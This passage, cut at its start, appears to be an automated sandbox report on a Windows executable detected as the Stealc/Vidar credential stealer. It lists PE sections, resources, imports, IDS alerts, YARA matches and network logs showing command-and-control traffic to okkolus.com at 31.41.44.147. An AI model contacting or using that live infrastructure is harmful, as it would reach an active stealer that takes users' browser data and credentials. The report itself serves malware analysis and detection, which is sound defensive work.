IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x26ee000       | 0x17a00      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0xc000          | 0x18c        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy           | Characteristics
.text  | 0x1000          | 0xa7b3       | 0xa800   | a348b7fef0847937bda16a227a110ac4 | False    | 0.6162574404761905 | data      | 6.584458478900951 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xc000          | 0x238ca      | 0x23a00  | 63652be27cb3906220238ec6760801ed | False    | 0.6058799342105263 | data      | 5.920319471747451 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x30000         | 0x26bd33c    | 0x2800   | e97657bf7ad1ab2806f27164f93ba97d | unknown  | unknown            | unknown   | unknown           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0x26ee000       | 0x17a00      | 0x17a00  | a862c21bfacd8f779ede71e4ac914e7e | False    | 0.43974247685185186 | data     | 5.043845287134813 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name                  | RVA       | Size   | Type                                                                          | Language | Country | ZLIB Complexity
GABUWOCEMOXOXATAZIWIV | 0x2701040 | 0x476  | ASCII text, with very long lines (1142), with no line terminators             | Turkish  | Turkey  | 0.626970227670753
RT_CURSOR             | 0x27014d8 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0                  |          |         | 0.31023454157782515
RT_CURSOR             | 0x2702398 | 0x130  | Device independent bitmap graphic, 32 x 64 x 1, image size 0                  |          |         | 0.7368421052631579
RT_CURSOR             | 0x27024c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0                 |          |         | 0.06130705394190871
RT_ICON               | 0x26ee850 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0                  | Turkish  | Turkey  | 0.4157782515991471
RT_ICON               | 0x26ef6f8 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 0                  | Turkish  | Turkey  | 0.5365523465703971
RT_ICON               | 0x26effa0 | 0x6c8  | Device independent bitmap graphic, 24 x 48 x 8, image size 0                  | Turkish  | Turkey  | 0.6054147465437788
RT_ICON               | 0x26f0668 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 0                  | Turkish  | Turkey  | 0.6575144508670521
RT_ICON               | 0x26f0bd0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0                 | Turkish  | Turkey  | 0.49336099585062243
RT_ICON               | 0x26f3178 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0                 | Turkish  | Turkey  | 0.5117260787992496
RT_ICON               | 0x26f4220 | 0x988  | Device independent bitmap graphic, 24 x 48 x 32, image size 0                 | Turkish  | Turkey  | 0.5795081967213115
RT_ICON               | 0x26f4ba8 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 0                 | Turkish  | Turkey  | 0.6090425531914894
RT_ICON               | 0x26f5088 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0                  | Turkish  | Turkey  | 0.39632196162046907
RT_ICON               | 0x26f5f30 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 0                  | Turkish  | Turkey  | 0.5185018050541517
RT_ICON               | 0x26f67d8 | 0x6c8  | Device independent bitmap graphic, 24 x 48 x 8, image size 0                  | Turkish  | Turkey  | 0.581221198156682
RT_ICON               | 0x26f6ea0 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 0                  | Turkish  | Turkey  | 0.6257225433526011
RT_ICON               | 0x26f7408 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0                 | Turkish  | Turkey  | 0.47313278008298754
RT_ICON               | 0x26f99b0 | 0x988  | Device independent bitmap graphic, 24 x 48 x 32, image size 0                 | Turkish  | Turkey  | 0.5278688524590164
RT_ICON               | 0x26fa338 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 0                 | Turkish  | Turkey  | 0.5514184397163121
RT_ICON               | 0x26fa808 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.43976545842217485
RT_ICON               | 0x26fb6b0 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.5613718411552346
RT_ICON               | 0x26fbf58 | 0x6c8  | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors  | Turkish | Turkey | 0.597926267281106
RT_ICON               | 0x26fc620 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors  | Turkish | Turkey | 0.6604046242774566
RT_ICON               | 0x26fcb88 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600              | Turkish  | Turkey  | 0.3771784232365145
RT_ICON               | 0x26ff130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224              | Turkish  | Turkey  | 0.4022045028142589
RT_ICON               | 0x27001d8 | 0x988  | Device independent bitmap graphic, 24 x 48 x 32, image size 2400              | Turkish  | Turkey  | 0.4266393442622951
RT_ICON               | 0x2700b60 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 1088              | Turkish  | Turkey  | 0.4299645390070922
RT_STRING             | 0x2704c78 | 0x3f0  | data                                                                          |          |         | 0.47023809523809523
RT_STRING             | 0x2705068 | 0xb6   | data                                                                          |          |         | 0.5824175824175825
RT_STRING             | 0x2705120 | 0x682  | data                                                                          |          |         | 0.42737094837935174
RT_STRING             | 0x27057a8 | 0x156  | data                                                                          |          |         | 0.5263157894736842
RT_STRING             | 0x2705900 | 0xfe   | data                                                                          |          |         | 0.5433070866141733
RT_ACCELERATOR        | 0x27014b8 | 0x20   | data                                                                          |          |         | 1.09375
RT_GROUP_CURSOR       | 0x2702380 | 0x14   | data                                                                          |          |         | 1.25
RT_GROUP_CURSOR       | 0x2704a70 | 0x22   | data                                                                          |          |         | 1.088235294117647
RT_GROUP_ICON         | 0x26f5010 | 0x76   | data                                                                          | Turkish  | Turkey  | 0.6610169491525424
RT_GROUP_ICON         | 0x26fa7a0 | 0x68   | data                                                                          | Turkish  | Turkey  | 0.7019230769230769
RT_GROUP_ICON         | 0x2700fc8 | 0x76   | data                                                                          | Turkish  | Turkey  | 0.6694915254237288
RT_VERSION            | 0x2704a98 | 0x1e0  | data                                                                          |          |         | 0.5708333333333333
DLL          | Import
KERNEL32.dll | GetCommState, SetDefaultCommConfigW, FreeEnvironmentStringsA, GetModuleHandleW, GetProcessHeap, GetConsoleAliasesLengthA, GetSystemTimes, GetVolumeInformationA, LoadLibraryW, IsBadCodePtr, GetConsoleAliasExesLengthW, lstrcpynW, GetModuleFileNameW, SetConsoleTitleA, SetCurrentDirectoryA, FindFirstFileExA, EnumCalendarInfoW, SetLastError, GetProcAddress, GetLongPathNameA, GetConsoleDisplayMode, SetFileAttributesA, BuildCommDCBW, SetFileApisToOEM, LoadLibraryA, WriteConsoleA, LocalAlloc, SetConsoleCtrlHandler, HeapWalk, FindAtomA, WaitForMultipleObjects, EnumDateFormatsW, GetSystemTime, GetCurrentDirectoryW, GetLocaleInfoA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CreateFileA, CloseHandle, FlushFileBuffers
ADVAPI32.dll | ReadEventLogA
Language of compilation system | Country where language is spoken | Map
Turkish                        | Turkey                           |
Timestamp                | Protocol | SID     | Message                                                                        | Source Port | Dest Port | Source IP    | Dest IP
05/06/24-02:52:39.695594 | TCP      | 2051831 | ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 80        | 49708     | 31.41.44.147 | 192.168.2.6
05/06/24-02:52:38.714464 | TCP      | 2044244 | ET TROJAN Win32/Stealc Requesting browsers Config from C2                      | 49707       | 80        | 192.168.2.6  | 31.41.44.147
05/06/24-02:52:39.070096 | TCP      | 2051828 | ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1            | 80          | 49707     | 31.41.44.147 | 192.168.2.6
05/06/24-02:52:39.336133 | TCP      | 2044246 | ET TROJAN Win32/Stealc Requesting plugins Config from C2                       | 49708       | 80        | 192.168.2.6  | 31.41.44.147
05/06/24-02:52:38.047891 | TCP      | 2044243 | ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in                                 | 49706       | 80        | 192.168.2.6  | 31.41.44.147
Timestamp                           | Source Port | Dest Port | Source IP    | Dest IP
May 6, 2024 02:52:37.787518024 CEST | 49706       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:38.046910048 CEST | 80          | 49706     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:38.047061920 CEST | 49706       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:38.047890902 CEST | 49706       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:38.351459026 CEST | 80          | 49706     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:38.409950972 CEST | 80          | 49706     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:38.410156012 CEST | 49706       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:38.411684036 CEST | 80          | 49706     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:38.411755085 CEST | 49706       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:38.416929007 CEST | 49706       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:38.436707020 CEST | 49707       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:38.676016092 CEST | 80          | 49706     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:38.700299978 CEST | 80          | 49707     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:38.700392008 CEST | 49707       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:38.714463949 CEST | 49707       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.019650936 CEST | 80          | 49707     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.070096016 CEST | 80          | 49707     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.070133924 CEST | 80          | 49707     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.070174932 CEST | 49707       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.070200920 CEST | 49707       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.070417881 CEST | 49707       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.071690083 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.335900068 CEST | 80          | 49708     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.335971117 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.336133003 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.365117073 CEST | 80          | 49707     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.365191936 CEST | 49707       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.643443108 CEST | 80          | 49708     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.695594072 CEST | 80          | 49708     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.695687056 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.695741892 CEST | 80          | 49708     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.695802927 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.877302885 CEST | 80          | 49708     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.877357960 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.920216084 CEST | 80          | 49708     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.920231104 CEST | 80          | 49708     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:39.920264959 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.920303106 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.920681953 CEST | 49708       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:39.973120928 CEST | 49709       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:40.184652090 CEST | 80          | 49708     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:40.234769106 CEST | 80          | 49709     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:40.234877110 CEST | 49709       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:40.235045910 CEST | 49709       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:40.235097885 CEST | 49709       | 80        | 192.168.2.6  | 31.41.44.147
May 6, 2024 02:52:40.495630980 CEST | 80          | 49709     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:40.495649099 CEST | 80          | 49709     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:40.495814085 CEST | 80          | 49709     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:40.496064901 CEST | 80          | 49709     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:40.496180058 CEST | 80          | 49709     | 31.41.44.147 | 192.168.2.6
May 6, 2024 02:52:40.496381998 CEST | 80          | 49709     | 31.41.44.147 | 192.168.2.6
                                            May 6, 2024 02:52:40.594436884 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.594455004 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:40.594572067 CEST4970980192.168.2.631.41.44.147
                                            May 6, 2024 02:52:40.683619022 CEST4970980192.168.2.631.41.44.147
                                            May 6, 2024 02:52:40.944010019 CEST804970931.41.44.147192.168.2.6
                                            May 6, 2024 02:52:43.595019102 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:43.857517958 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:43.857686043 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:43.863915920 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.167375088 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.221414089 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.221450090 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.221497059 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.221517086 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.309515953 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.309644938 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.309648037 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.309703112 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.361118078 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.361227989 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.361238003 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.361273050 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.446191072 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.446211100 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.446225882 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.446239948 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.446289062 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.446316957 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.483799934 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.483870983 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.483947992 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.483959913 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.483974934 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.483987093 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.484006882 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.484019041 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.571896076 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.572068930 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.572226048 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.572238922 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.572251081 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.572269917 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.572297096 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.623730898 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.623815060 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.623840094 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.623852015 CEST804971031.41.44.147192.168.2.6
                                            May 6, 2024 02:52:44.623882055 CEST4971080192.168.2.631.41.44.147
                                            May 6, 2024 02:52:44.623898983 CEST4971080192.168.2.631.41.44.147
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
May 6, 2024 02:52:35.917686939 CEST  57119        53         192.168.2.6   1.1.1.1
May 6, 2024 02:52:36.512387037 CEST  53           57119      1.1.1.1       192.168.2.6
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name         Type            Class        DNS over HTTPS
May 6, 2024 02:52:35.917686939 CEST  192.168.2.6  1.1.1.1  0xce17    Standard query (0)  okkolus.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name         CName  Address       Type            Class        DNS over HTTPS
May 6, 2024 02:52:36.512387037 CEST  1.1.1.1    192.168.2.6  0xce17    No error (0)  okkolus.com         31.41.44.147  A (IP address)  IN (0x0001)  false
• okkolus.com
No statistics
Target ID: 0
Start time: 02:51:48
Start date: 06/05/2024
Path: C:\Users\user\Desktop\FFAk2gixx5.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\FFAk2gixx5.exe"
Imagebase: 0x400000
File size: 296'960 bytes
MD5 hash: 14CD6D9CBAD80B0E4076212BF7AD937F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

No disassembly